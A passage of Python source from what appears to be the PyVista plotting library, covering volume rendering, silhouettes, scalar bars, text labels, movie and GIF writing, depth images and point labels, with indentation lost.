if scalar_bar_args is None:
scalar_bar_args = {}
else:
scalar_bar_args = scalar_bar_args.copy()
# account for legacy behavior
if 'stitle' in kwargs: # pragma: no cover
warnings.warn(USE_SCALAR_BAR_ARGS, PyvistaDeprecationWarning)
scalar_bar_args.setdefault('title', kwargs.pop('stitle'))
if show_scalar_bar is None:
show_scalar_bar = self._theme.show_scalar_bar
if culling is True:
culling = 'backface'
if mapper is None:
mapper = self._theme.volume_mapper
# only render when the plotter has already been shown
if render is None:
render = not self._first_time
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(volume):
if isinstance(volume, np.ndarray):
volume = wrap(volume)
if resolution is None:
resolution = [1, 1, 1]
elif len(resolution) != 3:
raise ValueError('Invalid resolution dimensions.')
volume.spacing = resolution
else:
volume = wrap(volume)
if not is_pyvista_dataset(volume):
raise TypeError(f'Object type ({type(volume)}) not supported for plotting in PyVista.')
else:
# HACK: Make a copy so the original object is not altered.
# Also, place all data on the nodes as issues arise when
# volume rendering on the cells.
volume = volume.cell_data_to_point_data()
if name is None:
name = f'{type(volume).__name__}({volume.memory_address})'
if isinstance(volume, pyvista.MultiBlock):
from itertools import cycle
cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples'])
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(volume.GetNumberOfBlocks()):
if volume[idx] is None:
continue
# Get a good name to use
next_name = f'{name}-{idx}'
# Get the data object
block = wrap(volume.GetBlock(idx))
if resolution is None:
try:
block_resolution = block.GetSpacing()
except AttributeError:
block_resolution = resolution
else:
block_resolution = resolution
if multi_colors:
color = next(cycler)
else:
color = cmap
a = self.add_volume(block, resolution=block_resolution, opacity=opacity,
n_colors=n_colors, cmap=color, flip_scalars=flip_scalars,
reset_camera=reset_camera, name=next_name,
ambient=ambient, categories=categories,
culling=culling, clim=clim,
mapper=mapper, pickable=pickable,
opacity_unit_distance=opacity_unit_distance,
shade=shade, diffuse=diffuse, specular=specular,
specular_power=specular_power, render=render)
actors.append(a)
return actors
if not isinstance(volume, pyvista.UniformGrid):
raise TypeError(f'Type {type(volume)} not supported for volume rendering at this time. Use `pyvista.UniformGrid`.')
if opacity_unit_distance is None:
opacity_unit_distance = volume.length / (np.mean(volume.dimensions) - 1)
if scalars is None:
# Make sure scalars components are not vectors/tuples
scalars = volume.active_scalars
# Don't allow plotting of string arrays by default
if scalars is not None and np.issubdtype(scalars.dtype, np.number):
scalar_bar_args.setdefault('title', volume.active_scalars_info[1])
else:
raise ValueError('No scalars to use for volume rendering.')
elif isinstance(scalars, str):
pass
##############
title = 'Data'
if isinstance(scalars, str):
title = scalars
scalars = get_array(volume, scalars,
preference=preference, err=True)
scalar_bar_args.setdefault('title', title)
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if not np.issubdtype(scalars.dtype, np.number):
raise TypeError('Non-numeric scalars are currently not supported for volume rendering.')
if scalars.ndim != 1:
scalars = scalars.ravel()
if scalars.dtype == np.bool_ or scalars.dtype == np.uint8:
scalars = scalars.astype(np.float_)
# Define mapper, volume, and add the correct properties
mappers = {
'fixed_point': _vtk.vtkFixedPointVolumeRayCastMapper,
'gpu': _vtk.vtkGPUVolumeRayCastMapper,
'open_gl': _vtk.vtkOpenGLGPUVolumeRayCastMapper,
'smart': _vtk.vtkSmartVolumeMapper,
}
if not isinstance(mapper, str) or mapper not in mappers.keys():
raise TypeError(f"Mapper ({mapper}) unknown. Available volume mappers include: {', '.join(mappers.keys())}")
self.mapper = make_mapper(mappers[mapper])
# Scalars interpolation approach
if scalars.shape[0] == volume.n_points:
volume.point_data.set_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == volume.n_cells:
volume.cell_data.set_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, volume)
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
###############
scalars = scalars.astype(np.float_)
with np.errstate(invalid='ignore'):
idxs0 = scalars < clim[0]
idxs1 = scalars > clim[1]
scalars[idxs0] = clim[0]
scalars[idxs1] = clim[1]
scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255
# scalars = scalars.astype(np.uint8)
volume[title] = scalars
self.mapper.scalar_range = clim
# Set colormap and build lookup table
table = _vtk.vtkLookupTable()
# table.SetNanColor(nan_color) # NaN's are chopped out with current implementation
# above/below colors not supported with volume rendering
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
if cmap is None: # Set default map if matplotlib is available
if _has_matplotlib():
cmap = self._theme.cmap
if cmap is not None:
if not _has_matplotlib():
raise ImportError('Please install matplotlib for volume rendering.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
if flip_scalars:
cmap = cmap.reversed()
color_tf = _vtk.vtkColorTransferFunction()
for ii in range(n_colors):
color_tf.AddRGBPoint(ii, *cmap(ii)[:-1])
# Set opacities
if isinstance(opacity, (float, int)):
opacity_values = [opacity] * n_colors
elif isinstance(opacity, str):
opacity_values = pyvista.opacity_transfer_function(opacity, n_colors)
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
opacity_values = opacity_transfer_function(opacity, n_colors)
opacity_tf = _vtk.vtkPiecewiseFunction()
for ii in range(n_colors):
opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors)
# Now put color tf and opacity tf into a lookup table for the scalar bar
table.SetNumberOfTableValues(n_colors)
lut = cmap(np.array(range(n_colors))) * 255
lut[:,3] = opacity_values
lut = lut.astype(np.uint8)
table.SetTable(_vtk.numpy_to_vtk(lut))
table.SetRange(*clim)
self.mapper.lookup_table = table
self.mapper.SetInputData(volume)
blending = blending.lower()
if blending in ['additive', 'add', 'sum']:
self.mapper.SetBlendModeToAdditive()
elif blending in ['average', 'avg', 'average_intensity']:
self.mapper.SetBlendModeToAverageIntensity()
elif blending in ['composite', 'comp']:
self.mapper.SetBlendModeToComposite()
elif blending in ['maximum', 'max', 'maximum_intensity']:
self.mapper.SetBlendModeToMaximumIntensity()
elif blending in ['minimum', 'min', 'minimum_intensity']:
self.mapper.SetBlendModeToMinimumIntensity()
else:
raise ValueError(f'Blending mode \'{blending}\' invalid. ' +
'Please choose one ' + 'of \'additive\', '
'\'composite\', \'minimum\' or ' + '\'maximum\'.')
self.mapper.Update()
self.volume = _vtk.vtkVolume()
self.volume.SetMapper(self.mapper)
prop = _vtk.vtkVolumeProperty()
prop.SetColor(color_tf)
prop.SetScalarOpacity(opacity_tf)
prop.SetAmbient(ambient)
prop.SetScalarOpacityUnitDistance(opacity_unit_distance)
prop.SetShade(shade)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
self.volume.SetProperty(prop)
actor, prop = self.add_actor(self.volume, reset_camera=reset_camera,
name=name, culling=culling,
pickable=pickable, render=render)
# Add scalar bar if scalars are available
if show_scalar_bar and scalars is not None:
self.add_scalar_bar(**scalar_bar_args)
self.renderer.Modified()
return actor
def add_silhouette(self, mesh, params=None):
"""Add a silhouette of a PyVista or VTK dataset to the scene.
A silhouette can also be generated directly in
:func:`add_mesh <pyvista.Plotter.add_mesh>`. See also
:ref:`silhouette_example`.
Parameters
----------
mesh : pyvista.PolyData
Mesh for generating silhouette to plot.
params : dict, optional
* If not supplied, the default theme values will be used.
* ``color``: ``str`` or 3-item ``list``, color of the silhouette
* ``line_width``: ``float``, edge width
* ``opacity``: ``float`` between 0 and 1, edge transparency
* ``feature_angle``: If a ``float``, display sharp edges
exceeding that angle in degrees.
* ``decimate``: ``float`` between 0 and 1, level of decimation
Returns
-------
vtk.vtkActor
VTK actor of the silhouette.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> bunny = examples.download_bunny()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(bunny, color='tan')
>>> _ = plotter.add_silhouette(bunny,
... params={'color': 'red', 'line_width': 8.0})
>>> plotter.view_xy()
>>> plotter.show()
"""
silhouette_params = self._theme.silhouette.to_dict()
if params:
silhouette_params.update(params)
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not isinstance(mesh, pyvista.PolyData):
raise TypeError(f"Expected type is `PolyData` but {type(mesh)} was given.")
if isinstance(silhouette_params["decimate"], float):
silhouette_mesh = mesh.decimate(silhouette_params["decimate"])
else:
silhouette_mesh = mesh
alg = _vtk.vtkPolyDataSilhouette()
alg.SetInputData(silhouette_mesh)
alg.SetCamera(self.renderer.camera)
if silhouette_params["feature_angle"] is not None:
alg.SetEnableFeatureAngle(True)
alg.SetFeatureAngle(silhouette_params["feature_angle"])
else:
alg.SetEnableFeatureAngle(False)
mapper = make_mapper(_vtk.vtkDataSetMapper)
mapper.SetInputConnection(alg.GetOutputPort())
actor, prop = self.add_actor(mapper)
prop.SetColor(parse_color(silhouette_params["color"]))
prop.SetOpacity(silhouette_params["opacity"])
prop.SetLineWidth(silhouette_params["line_width"])
return actor
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
clim : sequence
The new range of scalar bar. Two item list (e.g. ``[-1, 2]``).
name : str, optional
The title of the scalar bar to update.
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise AttributeError('This plotter does not have an active mapper.')
self.mapper.scalar_range = clim
return
# Use the name to find the desired actor
def update_mapper(mapper_helper):
mapper_helper.scalar_range = clim
return
try:
for mh in self._scalar_bar_mappers[name]:
update_mapper(mh)
except KeyError:
raise KeyError('Name ({}) not valid/not found in this plotter.')
return
def clear(self):
"""Clear plot by removing all actors and properties.
Examples
--------
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.clear()
>>> plotter.renderer.actors
{}
"""
self.renderers.clear()
self.scalar_bars.clear()
self.mesh = None
def link_views(self, views=0):
"""Link the views' cameras.
Parameters
----------
views : int | tuple or list
If ``views`` is int, link the views to the given view
index or if ``views`` is a tuple or a list, link the given
views cameras.
"""
if isinstance(views, (int, np.integer)):
for renderer in self.renderers:
renderer.camera = self.renderers[views].camera
return
views = np.asarray(views)
if np.issubdtype(views.dtype, np.integer):
for view_index in views:
self.renderers[view_index].camera = \
self.renderers[views[0]].camera
else:
raise TypeError('Expected type is int, list or tuple:'
f'{type(views)} is given')
def unlink_views(self, views=None):
"""Unlink the views' cameras.
Parameters
----------
views : None, int, tuple or list
If ``views`` is None unlink all the views, if ``views``
is int unlink the selected view's camera or if ``views``
is a tuple or a list, unlink the given views cameras.
"""
if views is None:
for renderer in self.renderers:
renderer.camera = Camera()
renderer.reset_camera()
elif isinstance(views, int):
self.renderers[views].camera = Camera()
self.renderers[views].reset_camera()
elif isinstance(views, collections.abc.Iterable):
for view_index in views:
self.renderers[view_index].camera = Camera()
self.renderers[view_index].reset_camera()
else:
raise TypeError('Expected type is None, int, list or tuple:'
f'{type(views)} is given')
@wraps(ScalarBars.add_scalar_bar)
def add_scalar_bar(self, *args, **kwargs):
"""Wrap for ``ScalarBars.add_scalar_bar``."""
# only render when the plotter has already been shown
render = kwargs.get('render', None)
if render is None:
kwargs['render'] = not self._first_time
# check if maper exists
mapper = kwargs.get('mapper', None)
if mapper is None:
if not hasattr(self, 'mapper') or self.mapper is None:
raise AttributeError('Mapper does not exist. '
'Add a mesh with scalars first.')
kwargs['mapper'] = self.mapper
# title can be the first and only arg
if len(args):
title = args[0]
else:
title = kwargs.get('title', '')
if title is None:
title = ''
kwargs['title'] = title
interactive = kwargs.get('interactive', None)
if interactive is None:
interactive = self._theme.interactive
if self.shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
raise ValueError('Interactive scalar bars disabled for multi-renderer plots')
# by default, use the plotter local theme
kwargs.setdefault('theme', self._theme)
return self.scalar_bars.add_scalar_bar(**kwargs)
def update_scalars(self, scalars, mesh=None, render=True):
"""Update scalars of an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Force a render when True. Default ``True``.
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.abc.Iterable, pyvista.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.render()
return
if isinstance(scalars, str):
# Grab scalars array if name given
scalars = get_array(mesh, scalars)
if scalars is None:
if render:
self.render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise ValueError('No active scalars')
s = convert_array(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalars array is modified by this function...
mesh.GetPoints().Modified()
except:
pass
if render:
self.render()
def update_coordinates(self, points, mesh=None, render=True):
"""Update the points of an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Force a render when True. Default ``True``.
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
# only render when the plotter has already been shown
if render is None:
render = not self._first_time
if render:
self.render()
def _clear_ren_win(self):
"""Clear the render window."""
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
def close(self, render=False):
"""Close the render window.
Parameters
----------
render : bool
Unused argument.
"""
# optionally run just prior to exiting the plotter
if self._before_close_callback is not None:
self._before_close_callback(self)
self._before_close_callback = None
# must close out widgets first
super().close()
# Renderer has an axes widget, so close it
self.renderers.close()
self.renderers.remove_all_lights()
# Grab screenshots of last render
if self._store_image:
self.last_image = self.screenshot(None, return_img=True)
self.last_image_depth = self.get_image_depth()
# reset scalar bars
self.clear()
# grab the display id before clearing the window
# this is an experimental feature
if KILL_DISPLAY: # pragma: no cover
disp_id = None
if hasattr(self, 'ren_win'):
disp_id = self.ren_win.GetGenericDisplayId()
self._clear_ren_win()
if self.iren is not None:
self.iren.remove_observers()
self.iren.terminate_app()
if KILL_DISPLAY: # pragma: no cover
_kill_display(disp_id)
self.iren = None
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
# this helps managing closed plotters
self._closed = True
def deep_clean(self):
"""Clean the plotter of the memory."""
if hasattr(self, 'renderers'):
self.renderers.deep_clean()
if getattr(self, 'mesh', None) is not None:
self.mesh.point_data = None
self.mesh.cell_data = None
self.mesh = None
if getattr(self, 'mapper', None) is not None:
self.mapper.lookup_table = None
self.mapper = None
self.volume = None
self.textActor = None
def add_text(self, text, position='upper_left', font_size=18, color=None,
font=None, shadow=False, name=None, viewport=False):
"""Add text to plot object in the top left corner by default.
Parameters
----------
text : str
The text to add the rendering.
position : str, tuple(float), optional
Position to place the bottom left corner of the text box.
If tuple is used, the position of the text uses the pixel
coordinate system (default). In this case,
it returns a more general `vtkOpenGLTextActor`.
If string name is used, it returns a `vtkCornerAnnotation`
object normally used for fixed labels (like title or xlabel).
Default is to find the top left corner of the rendering window
and place text box up there. Available position: ``'lower_left'``,
``'lower_right'``, ``'upper_left'``, ``'upper_right'``,
``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and
``'left_edge'``.
font_size : float, optional
Sets the size of the title font. Defaults to 18.
color : str or sequence, optional
Either a string, RGB list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
Defaults to :attr:`pyvista.global_theme.font.color <pyvista.themes._Font.color>`.
font : str, optional
Font name may be ``'courier'``, ``'times'``, or ``'arial'``.
shadow : bool, optional
Adds a black shadow to the text. Defaults to ``False``.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
viewport : bool, optional
If ``True`` and position is a tuple of float, uses the
normalized viewport coordinate system (values between 0.0
and 1.0 and support for HiDPI).
Returns
-------
vtk.vtkTextActor
Text actor added to plot.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> actor = pl.add_text('Sample Text', position='upper_right', color='blue',
... shadow=True, font_size=26)
>>> pl.show()
"""
if font is None:
font = self._theme.font.family
if font_size is None:
font_size = self._theme.font.size
if color is None:
color = self._theme.font.color
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.85) / self.shape[0]
position = [x, y]
corner_mappings = {
'lower_left': _vtk.vtkCornerAnnotation.LowerLeft,
'lower_right': _vtk.vtkCornerAnnotation.LowerRight,
'upper_left': _vtk.vtkCornerAnnotation.UpperLeft,
'upper_right': _vtk.vtkCornerAnnotation.UpperRight,
'lower_edge': _vtk.vtkCornerAnnotation.LowerEdge,
'upper_edge': _vtk.vtkCornerAnnotation.UpperEdge,
'left_edge': _vtk.vtkCornerAnnotation.LeftEdge,
'right_edge': _vtk.vtkCornerAnnotation.RightEdge,
}
corner_mappings['ll'] = corner_mappings['lower_left']
corner_mappings['lr'] = corner_mappings['lower_right']
corner_mappings['ul'] = corner_mappings['upper_left']
corner_mappings['ur'] = corner_mappings['upper_right']
corner_mappings['top'] = corner_mappings['upper_edge']
corner_mappings['bottom'] = corner_mappings['lower_edge']
corner_mappings['right'] = corner_mappings['right_edge']
corner_mappings['r'] = corner_mappings['right_edge']
corner_mappings['left'] = corner_mappings['left_edge']
corner_mappings['l'] = corner_mappings['left_edge']
if isinstance(position, (int, str, bool)):
if isinstance(position, str):
position = corner_mappings[position]
elif position is True:
position = corner_mappings['upper_left']
self.textActor = _vtk.vtkCornerAnnotation()
# This is how you set the font size with this actor
self.textActor.SetLinearFontScaleFactor(font_size // 2)
self.textActor.SetText(position, text)
else:
self.textActor = _vtk.vtkTextActor()
self.textActor.SetInput(text)
self.textActor.SetPosition(position)
if viewport:
self.textActor.GetActualPositionCoordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetActualPosition2Coordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetTextProperty().SetFontSize(int(font_size * 2))
self.textActor.GetTextProperty().SetColor(parse_color(color))
self.textActor.GetTextProperty().SetFontFamily(FONTS[font].value)
self.textActor.GetTextProperty().SetShadow(shadow)
self.add_actor(self.textActor, reset_camera=False, name=name, pickable=False)
return self.textActor
def open_movie(self, filename, framerate=24, quality=5, **kwargs):
"""Establish a connection to the ffmpeg writer.
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See ``imagio.get_writer``.
framerate : int, optional
Frames per second.
quality : int, optional
Quality 10 is the top possible quality for any codec. The
range is ``0 - 10``. Higher quality leads to a larger file.
**kwargs : dict, optional
See the documentation for ``imageio.get_writer`` for additional kwargs.
Notes
-----
See the documentation for `imageio.get_writer
<https://imageio.readthedocs.io/en/stable/userapi.html#imageio.get_writer>`_
Examples
--------
Open a MP4 movie and set the quality to maximum.
>>> import pyvista
>>> pl = pyvista.Plotter
>>> pl.open_movie('movie.mp4', quality=10) # doctest:+SKIP
"""
from imageio import get_writer
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self.mwriter = get_writer(filename, fps=framerate, quality=quality, **kwargs)
def open_gif(self, filename):
"""Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in ``"gif"``.
Examples
--------
Open a gif file.
>>> import pyvista
>>> pl = pyvista.Plotter
>>> pl.open_gif('movie.gif') # doctest:+SKIP
"""
from imageio import get_writer
if filename[-3:] != 'gif':
raise ValueError('Unsupported filetype. Must end in .gif')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = get_writer(filename, mode='I')
def write_frame(self):
"""Write a single frame to the movie file.
Examples
--------
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> plotter.open_movie(filename) # doctest:+SKIP
>>> plotter.add_mesh(pyvista.Sphere()) # doctest:+SKIP
>>> plotter.write_frame() # doctest:+SKIP
See :ref:`movie_example` for a full example using this method.
"""
# if off screen, show has not been called and we must render
# before extracting an image
if self._first_time:
self._on_first_render_request()
self.render()
if not hasattr(self, 'mwriter'):
raise RuntimeError('This plotter has not opened a movie or GIF file.')
self.update()
self.mwriter.append_data(self.image)
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = pyvista.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = pyvista.utilities.point_array(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
def get_image_depth(self,
fill_value=np.nan,
reset_camera_clipping_range=True):
"""Return a depth image representing current render window.
Parameters
----------
fill_value : float, optional
Fill value for points in image that do not include objects
in scene. To not use a fill value, pass ``None``.
reset_camera_clipping_range : bool, optional
Reset the camera clipping range to include data in view.
Returns
-------
numpy.ndarray
Image of depth values from camera orthogonal to image
plane.
Notes
-----
Values in image_depth are negative to adhere to a
right-handed coordinate system.
Examples
--------
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.store_image = True
>>> plotter.show()
>>> zval = plotter.get_image_depth()
"""
# allow no render window
if not hasattr(self, 'ren_win') and self.last_image_depth is not None:
zval = self.last_image_depth.copy()
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
self._check_rendered()
self._check_has_ren_win()
# Ensure points in view are within clipping range of renderer?
if reset_camera_clipping_range:
self.renderer.ResetCameraClippingRange()
# Get the z-buffer image
ifilter = _vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
zbuff = self._run_image_filter(ifilter)[:, :, 0]
# Convert z-buffer values to depth from camera
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
near, far = self.camera.clipping_range
if self.camera.parallel_projection:
zval = (zbuff - near) / (far - near)
else:
zval = 2 * near * far / ((zbuff - 0.5) * 2 * (far - near) - near - far)
# Consider image values outside clipping range as nans
self._image_depth_null = np.logical_or(zval < -far, np.isclose(zval, -far))
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
def add_lines(self, lines, color=(1, 1, 1), width=5, label=None, name=None):
"""Add lines to the plotting object.
Parameters
----------
lines : np.ndarray or pyvista.PolyData
Points representing line segments. For example, two line
segments would be represented as ``np.array([[0, 0, 0],
[1, 0, 0], [1, 0, 0], [1, 1, 0]])``.
color : str or sequence, optional
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
width : float, optional
Thickness of lines.
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
vtk.vtkActor
Lines actor.
Examples
--------
>>> import numpy as np
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> points = np.array([[0, 1, 0], [1, 0, 0], [1, 1, 0], [2, 0, 0]])
>>> actor = pl.add_lines(points, color='yellow', width=3)
>>> pl.camera_position = 'xy'
>>> pl.show()
"""
if not isinstance(lines, np.ndarray):
raise TypeError('Input should be an array of point segments')
lines = pyvista.lines_from_points(lines)
# Create mapper and add lines
mapper = _vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = parse_color(color)
# Create actor
actor = _vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetLineWidth(width)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(rgb_color)
actor.GetProperty().SetColor(rgb_color)
actor.GetProperty().LightingOff()
# legend label
if label:
if not isinstance(label, str):
raise TypeError('Label must be a string')
addr = actor.GetAddressAsString("")
self.renderer._labels[addr] = [lines, label, rgb_color]
# Add to renderer
self.add_actor(actor, reset_camera=False, name=name, pickable=False)
return actor
@wraps(ScalarBars.remove_scalar_bar)
def remove_scalar_bar(self, *args, **kwargs):
"""Remove the active scalar bar."""
self.scalar_bars.remove_scalar_bar(*args, **kwargs)
def add_point_labels(self, points, labels, italic=False, bold=True,
font_size=None, text_color=None,
font_family=None, shadow=False,
show_points=True, point_color=None, point_size=5,
name=None, shape_color='grey', shape='rounded_rect',
fill_shape=True, margin=3, shape_opacity=1.0,
pickable=False, render_points_as_spheres=False,
tolerance=0.001, reset_camera=None, always_visible=False,
render=True):
"""Create a point actor with one label from list labels assigned to each point.
Parameters
----------
points : sequence or pyvista.DataSet
An ``n x 3`` sequence points or pyvista dataset with points.
labels : list or str
List of labels. Must be the same length as points. If a
string name is given with a :class:`pyvista.DataSet` input for
points, then these are fetched.
italic : bool, optional
Italicises title and bar labels. Default ``False``.
bold : bool, optional
Bolds title and bar labels. Default ``True``.
font_size : float, optional
Sets the size of the title font. Defaults to 16.
text_color : str or 3 item list, optional
Color of text. Either a string, RGB sequence, or hex color string.
* ``text_color='white'``
* ``text_color='w'``
* ``text_color=[1, 1, 1]``
* ``text_color='#FFFFFF'``
font_family : str, optional
Font family. Must be either ``'courier'``, ``'times'``,
or ``'arial``.
shadow : bool, optional
Adds a black shadow to the text. Defaults to ``False``.
show_points : bool, optional
Controls if points are visible. Default ``True``.
point_color : str or sequence, optional
Either a string, rgb list, or hex color string. One of
the following.
* ``point_color='white'``
* ``point_color='w'``
* ``point_color=[1, 1, 1]``
* ``point_color='#FFFFFF'``
point_size : float, optional
Size of points if visible.
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
shape_color : str or sequence, optional
Color of points (if visible). Either a string, rgb
sequence, or hex color string.
shape : str, optional
The string name of the shape to use. Options are ``'rect'`` or
``'rounded_rect'``. If you want no shape, pass ``None``.
fill_shape : bool, optional
Fill the shape with the ``shape_color``. Outlines if ``False``.
margin : int, optional
The size of the margin on the label background shape. Default is 3.
shape_opacity : float, optional
The opacity of the shape in the range of ``[0, 1]``.
pickable : bool, optional
Set whether this actor is pickable.
render_points_as_spheres : bool, optional
Render points as spheres rather than dots.
tolerance : float, optional
A tolerance to use to determine whether a point label is
visible. A tolerance is usually required because the
conversion from world space to display space during
rendering introduces numerical round-off.
reset_camera : bool, optional
Reset the camera after adding the points to the scene.
always_visible : bool, optional
Skip adding the visibility filter. Default False.
render : bool, optional
Force a render when ``True`` (default).
Returns
-------
vtk.vtkActor2D
VTK label actor. Can be used to change properties of the labels.
Examples
--------
>>> import numpy as np
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> points = np.array([[0, 0, 0],
... [1, 1, 0],
... [2, 0, 0]])
>>> labels = ['Point A', 'Point B', 'Point C']
>>> actor = pl.add_point_labels(points, labels, italic=True, font_size=20,
... point_color='red', point_size=20, render_points_as_spheres=True,
... always_visible=True, shadow=True)
>>> pl.camera_position = 'xy'
>>> pl.show()
"""
if font_family is None:
font_family = self._theme.font.family
if font_size is None:
font_size = self._theme.font.size
if point_color is None:
point_color = self._theme.color
if text_color is None:
text_color = self._theme.font.color
if isinstance(points, (list, tuple)):
points = np.array(points)
if isinstance(points, np.ndarray):
vtkpoints = pyvista.PolyData(points) # Cast to poly data
elif is_pyvista_dataset(points):
vtkpoints = pyvista.PolyData(points.points)
if isinstance(labels, str):
labels = points.point_data[labels]
else:
raise TypeError(f'Points type not usable: {type(points)}')
if len(vtkpoints.points) != len(labels):
raise ValueError('There must be one label for each point')
if name is None:
name = f'{type(vtkpoints).__name__}({vtkpoints.memory_address})'
vtklabels = _vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# Create hierarchy
hier = _vtk.vtkPointSetToLabelHierarchy()
hier.SetLabelArrayName('labels')
if always_visible:
hier.SetInputData(vtkpoints)
else:
# Only show visible points
vis_points = _vtk.vtkSelectVisiblePoints()
vis_points.SetInputData(vtkpoints)
vis_points.SetRenderer(self.renderer)
vis_points.SetTolerance(tolerance)
hier.SetInputConnection(vis_points.GetOutputPort())
# create label mapper
labelMapper = _vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(hier.GetOutputPort())
if not isinstance(shape, str):
labelMapper.SetShapeToNone()
elif shape.lower() in 'rect':
labelMapper.SetShapeToRect()
elif shape.lower() in 'rounded_rect':
labelMapper.SetShapeToRoundedRect()
else:
raise ValueError(f'Shape ({shape}) not understood')
if fill_shape:
labelMapper.SetStyleToFilled()
else:
labelMapper.SetStyleToOutline()
labelMapper.SetBackgroundColor(parse_color(shape_color))
labelMapper.SetBackgroundOpacity(shape_opacity)
labelMapper.SetMargin(margin)
textprop = hier.GetTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(parse_color(text_color))
textprop.SetShadow(shadow)
self.remove_actor(f'{name}-points', reset_camera=False)
self.remove_actor(f'{name}-labels', reset_camera=False)
# add points
if show_points:
